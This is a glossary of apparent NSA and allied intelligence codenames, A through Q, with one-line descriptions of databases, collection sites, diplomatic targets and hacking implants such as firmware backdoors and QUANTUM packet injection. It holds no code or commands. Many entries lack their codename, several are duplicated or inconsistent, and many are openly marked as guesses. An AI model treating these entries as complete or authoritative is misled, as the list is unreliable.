ACCORDIAN – Type 1 Cryptographic algorithm used in a number of crypto products

AETHER – ONI tool “to correlate seemingly disparate entities and relationships, to identify networks of interest, and to detect patterns”

AGILITY – NSA internet information tool or database

AGILEVIEW – NSA internet information tool or database

AIRGAP – Database which deals with priority DoD missions

AIRHANDLER – NSA-G operations center for producing intelligence from Afghanistan

AIRSTEED – Cell phone tracking program of the Global Access Operations (GAO)

AIRWOLF – ?

ALAMITO – The mission of Mexico at the United Nations in New York

ALPHA – Retired SIGINT Exchange Designator for Great Britain

ALTEREGO – A type of Question-Focused Dataset based on E.164

AMBERJACK – SIGINT/EW collection and exploitation system

AMBLE – Retired SIGINT product codeword

AMBULANT (AMB) – SI-ECI compartment related to the BULLRUN program

ANCHORY – NSA software system which provides web access to textual intelligence documents

ANGRYNEIGHBOR – Family of radar retro-reflector tools used by NSA’s TAO division

APALATCHEE – The EU mission in New York

APERIODIC – SI-ECI compartment related to the BULLRUN program

APEX – IP packet reconstruction tool(?)

APPLE1 – Upstream collection site

APSTARS – NSA tool that provides “semantic integration of data from multiple sources in support of intelligence processing”

ARKSTREAM – Implant used to reflash BIOS, installed by remote access or intercepted shipping

ARTIFICE – SSO corporate partner (foreign?)

AUTOSOURCE – NSA tool or database

AQUACADE – A class of SIGINT spy satellites (formerly RHYOLITE)

AQUADOR – Merchant ship tracking tool

ARCA – SIGINT Exchange Designator for ?

ARGON – Satellite mapping program

ARTIFICE – SSO corporate partner under the STORMBREW program

ASPHALT – Project to increase the volume of satellite intercepts at Menwith Hill Station

ASPHALT-PLUS – See above

ASSOCIATION – NSA analytical tool or database

ATALANTA – EU anti-piracy operation

ATLAS – CSEC database

AUNTIE – SI-ECI compartment related to the BULLRUN program

AUTO ASSOCIATION – Second party database

BAMBOOSPRING – ?

BANANAGLEE – Software implant that allows remote Jetplow firmware installation

BANISTER – The Columbian trade bureau in New York

BANYAN – NSA tactical geospatial correlation database

BASECOAT – Program targeting the mobile phone network on the Bahamas

BASTE – Retired SIGINT product codeword

– Type 1 Block cipher algorithm, used with many crypto products

BEACHHEAD – Computer exploit delivered by the FERRETCANON system

BEAMER – ?

BELLTOPPER – NSA database

BELLVIEW – SIGINT reporting tool

– List of personnel cleared for access to highly sensitive information or operations

BINOCULAR – Former NSA intelligence dissemination tool

BIRCHWOOD – Upstream collection site

BLACKBOOK – ODNI tool for large-scale semantic data analysis

BLACKFOOT – The French mission at the United Nations in New York

BLACKHEART – Collection through FBI implants

BLACKMAGIC – NSA database or tool

BLACKPEARL – NSA database of survey/case notations(?)

BLACKWATCH – NSA reporting tool

– Program for intercepting phone and internet traffic at switches in the US (since 1978)

BLINDDATE – Hacking tools for WLAN collection, plus GPS

BLUEANCHOR – Partner providing a network access point for the YACHTSHOP program

BLUEFISH (BLFH) – Compartment of the KLONDIKE control system

BLUEZEPHYR – Sub-program of OAKSTAR

BOOTY – Retired SIGINT product codeword

– DNI and DNR metadata visualization tool

BOURBON – Joint NSA and GCHQ program for breaking Soviet encryption codes (1946-?)

BROKENRECORD – NSA tool

BROKENTIGO – Tool for computer network operations

BROADSIDE – Covert listening post in the US embassy in Moscow

BROOMSTICK – ?

BRUNEAU – Operation against the Italian embassy in Washington DC using LIFESAVER techniques

BRUTUS – Tool or program related to MARINA

BUFFALOGREEN – The name ORANGECRUSH was known to Polish partners

BULLDOZER – PCI bus hardware implant on intercepted shipping

– An NSA COI for decryption of network communications

BULLSEYE – NSG High-Frequency Direction-Finding (HF-DF) network (now called CROSSHAIR)

(BYE) – Retired SCI control system for overhead collection systems (1961-2005)

BYZANTINE – First word of nicknames for programs involving defense against Chinese cyber-warfare and US offensive cyber-warfare

BYZANTINE ANCHOR (BA) – A group of Chinese hackers which compromised multiple US government and defense contractor systems since 2003

BYZANTINE CANDOR (BC) – A group of Chinese hackers which compromised a US-based ISP and at least one US government agency

BYZANTINE FOOTHOLD (BF) – A group of Chinese hackers who attacked various international companies and internet services providers

BYZANTINE HADES (BH) – A concerted effort against Chinese hackers who attacked the Pentagon and military contractors. Probably renamed to the LEGION-series

CADENCE – NSA database with tasking dictionaries

CAJABLOSSOM – Automated system for analysing and profiling internet browsing histories

CALYPSO – Remote SATCOM collection facility

CANDYGRAM – Laptop mimicking GSM cell tower, sends out SMS whenever registered target enters its area, for tracking and ID of targets

– Class of COMINT spy satellites (1968-1977)

CANOE – Retired SIGINT product codeword

CANNON LIGHT – Counterintelligence database of the US Army

CAPRICORN – (former?) database for voice data

CAPTIVATEDAUDIENCE – Computer implant plug-in to take over a targeted computer’s microphone and record conversations taking place near the device

CARBOY – Second Party satellite intercept station at Bude, England

CARBOY II – Units of ECHELON which break down satellite links into telephone and telegraph channels

CARILLON – NSA high performance computing center, since 1976 made up of IBM 360s and later four IBM 3033s

CASport – NSA user authorization service

– Computer system capable of automatically analyzing the massive quantities of data gathered across the entire intelligence community

CENTER ICE – Data center for the exchange of intelligence regarding Afghanistan among the members of the 14-Eyes/SSEUR

CENTERMASS – NSA tool or database

CERF CALL MOSES1 – Contact Event Record Format – for certain telephony metadata

CHALKFUN – Analytic tool, used to search the FASCIA database

CHASEFALCON – Major program of the Global Access Operations (GAO)

CHEER – Retired SIGINT product codeword

CHESS – Compartment of TALENT KEYHOLE for the U-2 spy plane

CHEWSTICK – NSA tool or database

CHIMNEYPOOL – Framework or specification of GENIE-compliance for hardware/software implants

CHIPPEWA – Some communications network, involving Israel

CHUTE – Retired SIGINT product codeword

CIMBRI – Probably a metadata database

CINEPLEX – NSA tool or database

CLASSIC BULLSEYE – Worldwide ocean SIGINT surveillance system (1960’s-?)

CLEVERDEVICE – Upstream collection site

CLOUD – NSA database

COASTLINE – NSA tool or database

COBALTFALCON – Sub-program of OAKSTAR

COBRA FOCUS – NSA-G operations center for producing intelligence from Iraq

COGNOS – NSA tool or database

CORDOBA – Type 2 Cryptographic algorithm used in a number of crypto chips

COMBAT SENT – Reconaissance operation

COMMONDEER – Computer exploit for looking whether a computer has security software

COMMONVIEW – NSA database or tool

CONFIRM – NSA database for personell access

CONJECTURE – Network compatible with HOWLERMONKEY

CONTRAOCTAVE – NSA telephony tasking database Used to determine ‘foreigness’

CONVEYANCE – Voice content ingest processor

COPILOT – System that automatically scans digital data for things like language, phone and creditcard numbers and attachments

COPSE – Retired SIGINT product codeword

CORALINE – NSA satellite intercept station at Sabena Seca at Puerto Rico (closed)

CORALREEF – Database for VPN crypto attack data

– A series of photographic surveillance satellites (1959-1972)

CO-TRAVELER – Set of tools for finding unknown associates of intelligence targets by tracking movements based upon cell phone locations

COTTONMOUTH (CM) – Computer implant devices used by NSA’s TAO division

COTTONMOUTH-I (CM-I) – USB hardware implant providing wireless bridge into target network and loading of exploit software onto target PCs, formerly DEWSWEEPER

COTTONMOUTH-II (CM-II) – USB hardware host tap provides covert link over USP into target’s network co-located with long haul relay; dual-stacked USB connector, consists of CM-I digital hardware plus long haul relay concealed in chassis; hub with switches is concealed in a dual stacked USB connector and hard-wired to provide intra-chassis link.

COTTONMOUTH-III (CM-III) – Radio Frequency link for commands to software implants and data infiltration/exfiltration, short range inter-chassis link within RJ45 Dual Stacked USB connector

COURIERSKILL – NSA Collection mission system

COWBOY – The DICTIONARY computer used at the Yakima station of ECHELON

CRANKSHAFT – Codename for Osama bin Laden

CREAM – Retired SIGINT product codeword

CREDIBLE – Transport of intelligence materials to partner agencies

CREST – Database that automatically translates foreign language intercepts in English

CRISSCROSS – Database of telecommunications selectors

CROSSBEAM – GSM module mating commercial Motorola cell with WagonBed controller board for collecting voice data content via GPRS (web), circuit-switched data, data over voice, and DTMF to secure facility, implanted cell tower switch

CROSSHAIR – NSG High-Frequency Direction-Finding (HF-DF) network (formerly BULLSEYE)

CROSSBONES – Analytic tool

CRUMPET – Covert network with printer, server and desktop nodes

CULTWEAVE – Smaller size SIGINT database

CYBERTRANS – A common interface to a number of underlying machine translation systems

CYCLONE Hx9 – Base station router, network in a box using Typhon interface

DAFF – Codeword for products of satellite imagery

DAMEON – Remote SATCOM collection facility

DANCINGOASIS (DGO) – SSO program collecting data from fiber optic cables between Europe and the Far East (since 2011)

DANDERSPRITZ – Software tool that spoofs IP and MAC addresses, intermediate redirector node

DANGERMOUSE – Tactical SIGINT collecting system for like cell phone calls

DARDANUS – Remote SATCOM collection facility

DAREDEVIL – Shooter/implant as part of the QUANTUM system

DARKTHUNDER – SSO Corporate/TAO Shaping program

DARKQUEST – Automated FORNSAT survey system

DAUNT – Retired SIGINT product codeword

DECKPIN – NSA crisis cell activated during emergencies

DEEPDIVE – An XKEYSCORE related method

DEITYBOUNCE – Provides implanted software persistence on Dell PowerEdge RAID servers via motherboard BIOS using Intel’s System Management Mode for periodic execution, installed via ArkStream to reflash the BIOS

DELTA – Former SCI control system for intercepts from Soviet military operations

DENIM – Retired SIGINT product codeword

DESPERADO – NSA software tool to prepare reports

DEWSWEEPER – Technique to tap USB hardware hosts

DIKTER – SIGINT Exchange Designator for Norway

DINAR – Retired compartment for intercepts from foreign embassies in Washington

DIONYSUS – Remote SATCOM collection facility

DIRESCALLOP – Method to circumvent commercial products that prevent malicious software from making changes to a computer system

DISCOROUTE – A tool for targeting passively collected telnet sessions

– NSA database for text messages (SMS)

DISTANTFOCUS – A pod for tactical SIGINT and precision geolocation (since 2005)

DIVERSITY – SIGINT Exchange Designator for ?

DOBIE – The South African consulate and mission at the UN in New York

DOCKETDICTATE – Something related to NSA’s TAO division

DOGCOLLAR – A type of Question-Focussed Dataset based on the Facebook display name cookie

DOGHUT – Upstream collection site

DOUBLEARROW – One of NSA’s voice processing databases?

DRAGGABLEKITTEN – An XKEYSCORE Map/Reduce analytic

DREADNOUGHT – NSA operation focused on Ayatollah Khamenei

– Passive collection of emanations (e.g. from printers or faxes) by using a radio frequency antenna

DROPOUTJEEP – STRAITBIZARRE-based software implant for iPhone, initially close access but later remotely

– System for processing data from mobile communication networks

DRUID – SIGINT Exchange Designator for third party countries

– A US military numeral cipher/authentication system

DRYTORTUGAS – Analytic tool

DYNAMO – SIGINT Exchange Designator for Denmark

EAGLE – Upstream collection site

– A SIGINT collection network run by Australia, Canada, New Zealand, the United Kingdom, and the United States

ECHO – SIGINT Exchange Designator for Australia

ECRU (EU) – Compartment of the ENDSEAL control system

EDEN – Upstream collection site

EGOTISTICALGIRAFFE (EGGI) – NSA program for exploiting the TOR network

EGOTISTICALGOAT (EGGO) – NSA tool for exploiting the TOR network

EIDER – Retired SIGINT product codeword

EINSTEIN – Cell phone network intercepting equipment used by SCS units

– Intrusion detection system for US government network gateways (deployed in 2004)

EINSTEIN 2 – Second version of the EINSTEIN program for detecting malicious network activity

EINSTEIN 3 – Third version of the EINSTEIN program that will monitor government computer traffic on private sector sites too

ELEGANTCHAOS – Large scale FORNSAT data analysis system

EMBRACEFLINT – Tool for computer network operations

ENDSEAL (EL) – SCI control system

ENDUE – A COI for sensitive decrypts of the BULLRUN program

ENTOURAGE – Directional finder for line of bearing for GSM, UMTS, CDMA, FRS signals, works with NEBULA active interrogator within GALAXY program

EPICSHELTER – Sophisticated data backup system designed by Edward Snowden

ERRONEOUSINGENUITY (ERIN) – NSA tool for exploiting the TOR network

EVENINGEASEL – Program for surveillance of phone and text communications from Mexico’s cell phone network

EVILOLIVE – Iinternet geolocation tool

EVOLVED MUTANT BROTH – Second party database

EYESPY – System that scans data for logos of companies, political parties and other organizations, as well for pictures with faces for facial recognition

FACELIFT – Codeword related to NSA’s Special Source Operations division

– NSA corporate partner with access to international cables, routers, and switches (since 1985)

FAIRVIEWCOTS – System for processing telephony metadata collected under the FAIRVIEW program

FALLENORACLE – NSA tool or database

FALLOUT – DNI metadata ingest processor/database

– DNR metadata ingest processor/database

FASCINATOR – Series of Type 1 encryption modules for Motorola digital-capable voice radios

FASHIONCLEFT (FC) – Wrapper used to exfiltrate data of VPN and VoIP communications

FASTBAT – Telephony related database?

FASTFOLLOWER – Tool to identify foreign agents who might tail American case officers overseas by correlating cellphone signals

FASTSCOPE – NSA database

FEEDTROUGH – Software implant for unauthorized access to Juniper firewall models N5XT, NS25, NS50, NS200, NS500, ISG1000

FERRETCANON – Subsystem of the FOXACID system

FINKDIFFERENT (FIDI) – Tool used for exploiting TOR networks

FIRE ANT – Open Source visualisation tool

– NSA key generation scheme, used for exchanging EKMS public keys

FIRETRUCK – SIGINT tool or database

FIREWALK -Bidirectional network implant, passive gigabit ethernet traffic collector and active ethernet packet injector within RJ45 Dual Stacked USB connector, digital core used with HOWLERMONKEY, formerly RADON

– NSA program for securing commercial smartphones

FLARE – Retired SIGINT product codeword

FLATLIQUID – TAO operation against the office of the Mexican president

FLEMING – The embassy of Slovakia in Washington DC

FLINTLOCK – The DICTIONARY computer used at the Waihopai station of ECHELON

FLUXBABBITT – Hardware implant for Dell PowerEdge RAID servers using Xeon processors

FOGGYBOTTOM – Computer implant plug-in that records logs of internet browsing histories and collects login details and passwords used to access websites and email accounts

FOREMAN – Tactical SIGINT database? Used to determine ‘foreigness’

FOURSCORE – (former?) database for fax and internet data

FOXACID (FA?) – System of secret internet servers used to attack target computers

FOXSEARCH – Tool for monitoring a QUANTUM target which involves FOXACID servers

FOXTRAIL – NSA tool or database

FRIARTUCK – VPN Events tool or database (CSEC?)

FREEFLOW-compliant – Supported by TURBULENCE architecture

FREEZEPOST – Something related to NSA’s TAO division

FRONTO – Retired SIGINT Exchange Designator for ?

FROSTBURG – Connection Machine 5 (CM-5) supercomputer, used by NSA from 1991-1997

FROTH – Retired SIGINT product codeword

FRUGALSHOT – FOXACID servers for receiving callbacks from computers infected with NSA spying software

GALACTICHALO – Remote SATCOM collection facility

GALAXY – Find/fix/finish program of locating signal-emitting devices of targets

GAMMA (G) – Compartment for highly sensitive communication intercepts

GAMUT – NSA collection tasking tool or database

GARLIC – The NSA satellite intercept station at Bad Aibling (Germany)

GATEKEEPER – NSA user account management system

GAVEL – Retired SIGINT product codeword

GECKO II – System consisting of hardware implant MR RF or GSM, UNITEDRAKE software implant, IRONCHEF persistence back door

GEMINI – Remote SATCOM collection facility

GENESIS – Modified GSM handset for covert network surveys, recording of RF spectrum use, and handset geolocation based on software defined radio

GENIE – Overall close-access program, collection by Sigads US-3136 and US-3137

GHOSTMACHINE – NSA’s Special Source Operations cloud analytics platform

GINSU – Provides software persistence for the CNE implant KONGUR having PCI bus hardware implant BULLDOZER on MS desktop PCs

GILGAMESH – Predator-based NSA geolocation system used by JSOC

GISTQEUE (GQ) – NSA software or database

GJALLER – NSA tool or database

GLINT – Retired SIGINT product codeword

GLOBALBROKER – NSA tool or database

GM-PLACE – Database for the BOUNDLESSINFORMANT tool

GODLIKELESION – Modernization program for NSA’s European Technical Center (ETC) in Wiesbaden in 2011

GODSURGE – Runs on FLUXBABBITT circuit board to provide software persistence by exploiting JTAG debugging interface of server processors, requires interdiction and removal of motherboard of JTAG scan chain reconnection

GOPHERSET – Software implant on GMS SIM phase 2+ Toolkit cards that exfiltrates contact list, SMS and call log from handset via SMS to user-defined phone; malware loaded using USB smartcard reader or over-the-air.

GOSSAMER – SIGINT/EW collection and exploitation system

GOTHAM – Processor for external monitor recreating target monitor from red video

GOURMETTROUGH – Configurable implant for Juniper NetScreen firewalls including SSG type, minimal beaconing

GOUT – Subcompartment of GAMMA for intercepts of South Vietnamese government communications

GOVPORT – US government user authentication service

GRAB – SIGINT satellite program

GREY FOX – The 2003 covername of the Mission Support Activity (MSA) of JSOC

GREYSTONE (GST) – CIA’s highly secret rendition and interrogation programs

GROK – Computer implant plug-in used to log keystrokes

GUMFISH – Computer implant plug-in to take over a computer’s webcam and snap photographs

GUPY – Subcompartment of GAMMA for intercepts from Soviet leadership car phones (1960’s-70’s)

HALLUXWATER – Software implant as boot ROM upgrade for Huawei Eudemon firewalls, finds patch points in inbound packet processing, used in O2, Vodafone and Deutsche Telekom

HAMMERCHANT – Implant for network routers to intercept and perform exploitation attacks against data sent through a Virtual Private Network (VPN) and/or phone calls via Skype and other VoIP software

HAMMERMILL – Insertion Tool controls HEADWATER boot ROM backdoor

HAMMERSTEIN – Implant for network routers to intercept and perform exploitation attacks against data sent through a Virtual Private Network (VPN) and/or phone calls via Skype and other VoIP software

HAPPYFOOT – Program that intercepts traffic generated by mobile apps that send a smartphone’s location to advertising networks

HARD ASSOCIATION – Second party database

– An IBM supercomputer used by NSA from 1962-1976

HAVE BLUE – Development program of the F-117A Stealth fighter-bomber

HAVE QUICK (HQ) – Frequency-hopping system protecting military UHF radio traffic

HEADWATER – Permanent backdoor in boot ROM for Huawei routers stable to firmware updates, installed over internet, capture and examination of all IP packets passing through host router, controlled by Hammermill Insertion Tool

HEMLOCK – Operation against the Italian embassy in Washington DC using HIGHLANDS techniques

HERCULES – CIA terrorism database

HERETIC – NSA tool or database

HEREYSTITCH – Collaboration program between NSA units T1222 and SSG

HERMOS – Joint venture between the German BND and another country with access for NSA (2012)

HERON – Retired SIGINT product codeword

HIGHCASTLE – Tactical database?

HIGHLANDS – Technique for collection from computer implants

HIGHTIDE – NSA tool or database

HOBGOBLIN – NSA tool or database

HOLLOWPOINT – Software defined radio platform

HOMEBASE – Database which allows analysts to coordinate tasking with DNI mission priorities

HOMEMAKER – Upstream collection site

HOMINGPIGEON – Program to intercept communications from airplane passengers

HOTZONE – ?

HOWLERMONKEY (HM) – Generic radio frequency (RF) transceiver tool used for various applications

HUFF – System like FOXACID?

HYSON – Retired SIGINT product codeword

ICEBERG – Major NSA backbone project

ICREACH – Tool that uses telephony metadata

IDITAROD (IDIT) – Compartment of the KLONDIKE control system

INCENSER – A joint NSA-GCHQ high-volume cable tapping operation, part of the WINDSTOP program

INDIA – SIGINT Exchange Designator for New Zealand (retired)

– Satellite intercept station near Khon Khaen, Thailand (1979-ca. 2000)

INTREPID SPEAR – The 2009 covername of the Mission Support Activity (MSA) of JSOC

– Series of ELINT and COMINT spy satellites (since 2009)

IRATEMONK – Hard drive firmware providing software persistence for desktops and laptops via Master Boot Record substitution, for Seagate Maxtor Samsung file systems FAR NRFS EXT3 UFS, payload is implant installer, shown at internet cafe

IRONAVENGER – NSA hacking operation against an ally and an adversary (2010)

IRONCHEF – Provides access persistence back door exploiting BIOS and SMM to communicate with a 2-way RF hardware implant

IRONSAND – Second Party satellite intercept station in New Zealand

ISHTAR – SIGINT Exchange Designator for Japan (retired)

ISLANDTRANSPORT – Internal messaging service, as part of the QUANTUM system

IVORY – Retired SIGINT product codeword

IVY BELLS – NSA, CIA and Navy operation to place wire taps on Soviet underwater communication cables

JACKKNIFE – The NSA satellite intercept station at Yakima (US)

JACKPOT – Internal NSA process improvement program (early 1990s – early 2000s)

JETPLOW – Persistent firmware back door for Cisco PIX and ASA firewall and routers, modifies OS at boot time

JOLLYROGER – NSA database

JOSEKI-1 – Classified Suite A algorithm

JOURNEYMAN – Major NSA backbone project

JUGGERNAUT – Ingest system for processing signals from (mobile?) phone networks

– Class of SIGINT reconnaissance satellites (1971-1983)

JUNIORMINT – Implant digital core, either mini printed circuit board or ultra-mini Flip Chip Module, contains ARM9 micro-controller, FPGA Flash SDRAM and DDR2 memories

KAMPUS – SIGINT Exchange Designator for ? (retired)

KANDIK (KAND) – Compartment of the KLONDIKE control system

KARMA POLICE – Second party database

KATEEL – The Brazilian embassy in Washington

KEA – Asymmetric-key Type 2 algorithm used in products like Fortezza, Fortezza Plus

KEELSON – Internet metadata processing system

KEYCARD – Database for VPN key exchange IP packet addresses

KEYRUT – SIGINT Exchange Designator for ? (retired)

KILTING – ELINT database

KIMBO – Retired SIGINT product codeword

KLIEGLIGHT (KL) – Tactical SIGINT reports

KLONDIKE (KDK) – Control system for sensitive geospatial intelligence

KLONDIKE – The embassy of Greece in Washington DC

KNIGHTHAWK – Probably a military SIGINT tool

– Method for summarizing very large textual data sets

KONGUR – Software implant restorable by GINSU after OS upgrade or reinstall

KRONE – Retired SIGINT product codeword

(LAC) – Retired NSA dissemination control marking

LADYLOVE – The NSA satellite intercept station at Misawa, Japan (since 1982)

LANYARD – Reconaissance satellite program

LARUM – Retired SIGINT product codeword

LEGION AMBER – Chinese hacking operation against a major US software company

LEGION JADE – A group of Chinese hackers

LEGION RUBY – A group of Chinese hackers

LEGION YANKEE – Chinese hacking operation against the Pentagon and defense contractors (2011)

LEMONWOOD – NSA satellite intercept station in Thailand

LEXHOUND – Tool for targeting social networking?

LIBERTY – First word of nicknames for collection and analysis programs used by JSOC and other sensitive DOD activities

LIBERTY BLUE – Modified RC-12 Guardrail surveillance airplane used by JSOC’s Mission Support Activity (MSA)

LIFESAVER – Technique which images the hard drive of computers

LIONSHARE – Internal NSA process improvement program (2003-2008)

LITHIUM – Facility to filter and gather data at a major (foreign?) telecommunications company under the BLARNEY program

LODESTONE – NSA’s CRAY-1 supercomputer

LOGGERHEAD – Device to collect contents of analog cell phone calls (made by Harris Corp.)

LOMA – SCI control system for Foreign Instrumentation and Signature Intelligence

LOPERS – Software application for Public Switched Telephone Networks or some kind of hardware

LOUDAUTO – An ANGRYNEIGHBOR radar retro-reflector, microphone captures room audio by pulse position modulation of square wave

MACHINESHOP – ?

MADCAPOCELOT – Sub-program of STORMBREW for collection of internet metadata about Russia and European terrorism

MAESTRO-II – Mini digital core implant, standard TAO implant architecture

MAGIC – Codeword for decrypted high-level diplomatic Nazi messages

– A keystroke logging software developed by the FBI

MAGNES – Remote SATCOM collection facility

MAGNETIC – Technique of sensor collection of magnetic emanations

– Series of SIGINT spy satellites (since 1985)

MAGOTHY – The embassy of the European Union in Washington DC

MAILORDER – Data transfer tool (SFTP-based?)

– Federal database of personal and financial data of suspicious US citizens

– NSA database of bulk phone metadata

MANASSAS – Former NSA counter-encryption program, succeeded by BULLRUN

– NSA database of bulk internet metadata

MARKHAM – NSA data system?

MARTES – NSA software tool to prepare reports

MASTERLINK – NSA tasking source

MASTERSHAKE – NSA tool or database

MATRIX – Some kind of data processing system

MAYTAG – Upstream collection site

MEDLEY – Classified Suite A algorithm

MENTOR – Class of SIGINT spy satellites (since 1995)

MERCED – The Bulgarian embassy in Washington DC

MERCURY – Soviet cipher machine partially exploited by NSA in the 1960’s

MERCURY – Remote SATCOM collection facility

MESSIAH – NSA automated message handling system

METAWAVE – Warehouse of unselected internet metadata

METROTUBE – Analytic tool for VPN data

METTLESOME – NSA Collection mission system

MIDAS – Satellite program

MIDDLEMAN – TAO covert network

MILKBONE – Question-Focused Dataset used for text message collection

– A sister project to Project SHAMROCK (1967-1973)

MINERALIZE – Technique for collection through LAN implants

MIRANDA – Some kind of number related to NSA targets

MIRROR – Interface to the ROADBED system

MOCCASIN – A hardware implant, permanently connected to a USB keyboard

MONKEYCALENDAR – Software implant on GMS SIM cards that exfiltrates user geolocation data

MONKEYROCKET – Sub-program of OAKSTAR for collecting internet metadata and content through a foreign access point

MOONLIGHTPATH (EGL?) – SSO collection facility

MOONPENNY – The NSA satellite intercept station at Harrogate (Great Britain)

MORAY – Compartment for the least sensitive COMINT material, retired in 1999

MORPHEUS – Program of the Global Access Operations (GAO)

MOTHMONSTER – NSA tool for exploiting the TOR network

MOVEONYX – Tool related to CASPORT

MULBERRY – The mission of Japan at the United Nations in New York

(JPM?) – Joint NSA-GCHQ operation to tap the cables linking Google and Yahoo data clouds to the internet Part of WINDSTOP

MUSKET – Retired SIGINT Exchange Designator for ?

MUSKETEER – NSA’s Special Signal Collection unit

– SSO unilateral voice interception program

– Presidential Global Communications System

NASHUA – The mission of India at the United Nations in New York

NAVAJO – The mission of Vietnam at the United Nations in New York

NAVARRO – The embassy of Georgia in Washington DC

NEBULA – Base station router similar to CYCLONE Hx9

NECTAR – SIGINT Exchange Designator for ? (retired)

NELEUS – Remote SATCOM collection facility

NEMESIS – SIGINT satellite

– Operation to kill or capture Osama bin Laden (2011)

NETBOTZ – Remote monitoring tool

NEWSDEALER – NSA’s internal intelligence news network

NIAGARAFILES – Data transfer tool (SFTP-based?)

NIGHTSTAND – 802.11 wireless packet injection tool that runs on standalone x86 laptop running Linux Fedora Core 3 and exploits windows platforms running Internet Explorer, from 8 miles away

NIGHTWATCH – Portable computer in shielded case for recreating target monitor from progressive-scan non-interlaced VAGRANT signals

NINJANIC – Something related to TURMOIL

NITESURF – NSA tool or database

NITRO – Remote SATCOM collection facility

NOCON – NSA dissemination marking or COI

NONBOOK (NK) – Compartment of the ENDSEAL control system

NORMALRUN – NSA tool or database

NUCLEON – Database for contents of phone calls

NYMROD – Automated name recognition system

– Umbrella program to filter and gather information at major telecommunications companies (since 2004)

OCEAN – Optical collection system for raster-based computer screens

OCEANARIUM – Database for SIGINT from NSA and intelligence sharing partners around the world

OCEANFRONT – Part of the communications network for ECHELON

OCEAN SHIELD – NATO anti-piracy operation

OCEANSURF – Engineering hub of the Global Access Operations (GAO)

OCELOT – Actual name: MADCAPOCELOT

OCTAVE – NSA tool for telephone network tasking (succeeded by the UTT?)

OCTSKYWARD – Collection of GSM data from flying aircraft

OILSTOCK – A system for analyzing air warning and surveillance data

– CSEC tool for discovering and identifying telephone and computer connections

OLYMPIC – First word of nicknames for programs involving defense against Chinese cyber-warfare and US offensive cyber-warfare

OLYMPIC GAMES – Joint US and Israel operation against the Iranian nuclear program (aka Stuxnet)

OLYMPUS – Software component of VALIDATOR/SOMBERKNAVE used to communicate via wireless LAN 802.11 hardware

OMNIGAT – Field network component

ONEROOF – Main tactical SIGINT database, with raw and unfiltered intercepts

– Newer units of the LACROSSE reconaissance satellites

ORANGEBLOSSOM – Sub-program of OAKSTAR for collection from an international transit switch (sigad: US-3251)

ORANGECRUSH – Sub-program of OAKSTAR for collecting metadata, voice, fax, phone and internet content through a foreign access point

ORION – SIGINT satellite

ORLANDOCARD – NSA operation thtat attracted visits from 77,413 foreign computers and planted spyware on more than 1,000 by using a ‘honeypot’ computer

OSAGE – The embassy of India in Washington DC

OSCAR – SIGINT Exchange Designator for the USA

OSWAYO – The embassy annex of India in Washington DC

– The Lockheed A-12 program (better known as SR-71)

PACKAGEDGOODS – Program which tracks the ‘traceroutes’ through which data flows around the Internet

PACKETSCOPE – Internet cable tapping system

PACKETSWING – NSA tool or database

PACKETWRENCH – Computer exploit delivered by the FERRETCANON system

PADSTONE – Type 1 Cryptographic algorithm used in several crypto products

PAINTEDEAGLE – SI-ECI compartment related to the BULLRUN program

PALANTERRA – A family of spatially and analytically enabled Web-based interfaces used by the NGA

PANGRAM (PM) – Alleged SCI control system

PANTHER – The embassy of Vietnam in Washington DC

PARCHDUSK (PD) – Productions Operation of NSA’s TAO division

PARTNERMALL PROGRAM (PMP) – A single collaboration environment, to be succeeded by the Global Collaboration Environment (GCE)

PARTSHOP – ?

PATHFINDER – SIGINT analysis tool (developed by SAIC)

PATHWAY – NSA’s former main computer communications network

– Call chaining analysis tool (developed by i2)

PAWLEYS – SI-ECI compartment related to the BULLRUN program

PEARL – Retired SIGINT product codeword

PEDDLECHEAP – Computer exploit delivered by the FERRETCANON system

PENDLETON – SI-ECI compartment related to the BULLRUN program

PEPPERBOX – Tool or database for targeting Requests (CSEC?)

PERDIDO – The mission of the European Union at the United Nations in New York

PERFECTMOON – An out-sites covering system

PHOTOANGLO – A continuous wave generator and receiver. The bugs on the other end are ANGRYNEIGHBOR class

PIEDMONT – SI-ECI compartment related to the BULLRUN program

PICARESQUE (PIQ) – SI-ECI compartment related to the BULLRUN program

PICASSO – Modified GSM handset that collects user data plus room audio

PINUP – Retired SIGINT product codeword

– Database for recorded signals intercepts/internet content

PITCHFORD – SI-ECI compartment related to the BULLRUN program

PIVOT – Retired SIGINT product codeword

PIXIE – Retired SIGINT product codeword

PLATFORM – Computer system linking the ECHELON intercept sites

PLUS – NSA SIGINT production feedback program

POCOMOKE – The Brazilian Permanent Mission to the UN in New York

POISON NUT – CES VPN attack orchestrator

POLARBREEZE – NSA technique to tap into nearby computers

POPPY – SIGINT satellite program

POPTOP – Collection system for telephony data

POWELL – The Greek mission at the United Nations in New York

PREFER – System for identifying and extracting text messages (SMS) from the DISHFIRE database

PRESSUREPORT – Software interface related to PRESSUREWAVE

PRESSUREWAVE – NSA cloud database for VPN and VoIP content and metadata

PRIMECANE – American high-tech company cooperating in providing a network access point for the ORANGECRUSH program

– Program for collecting foreign internet data from US internet companies

PROFORMA – Intelligence derived from computer-based data

– Mobile tactical SIGINT collection system

PROTEIN – SIGINT Exchange Designator for ?

PROTON – SIGINT database for time-sensitive targets/counterintelligence

PROTOSS – Local computer handling radio frequency signals from implants

PURPLE – Codename for a Japanese diplomatic cryptosystem during WWII

– US military OPSEC program (since 1966)

PUTTY – NSA tool or database

PUZZLECUBE – NSA tool or database

PYLON – SIGINT Exchange Designator for ?

QUADRANT – A crypto implementation code

QUADRESPECTRE PRIME – ?

– A consolidated QUANTUMTHEORY platform to reduce latencies by co-locating passive sensors with local decisioning and traffic injection (under development in 2011)

– Secret servers placed by NSA at key places on the internet backbone; part of the TURMOIL program

QUANTUMBISCUIT – Enhancement of QUANTUMINSERT for targets which are behind large proxies

QUANTUMBOT – Method for taking control of idle IRC bots and botnets)

QUANTUMBOT2 – Combination of Q-BOT and Q-BISCUIT for webbased botnets

QUANTUMCOOKIE – Method to force cookies onto target computers

QUANTUMCOPPER – Method for corrupting file uploads and downloads

QUANTUMDNS – DNS injection/redirection based off of A record queries

QUANTUMHAND – Man-on-the-side technique using a fake Facebook server

QUANTUMINSERT (QI) – Man-on-the-side technique that redirects target internet traffic to a FOXACID server for exploitation

QUANTUMMUSH – Targeted spam exploitation method

QUANTUMNATION – Umbrella for COMMONDEER and VALIDATOR computer exploits

QUANTUMPHANTOM – Hijacks any IP address to use as covert infrastructure

QUANTUMSKY – Malware used to block targets from accessing certain websites through RST packet spoofing

QUANTUMSMACKDOWN – Method for using packet injection to block attacks against DoD computers

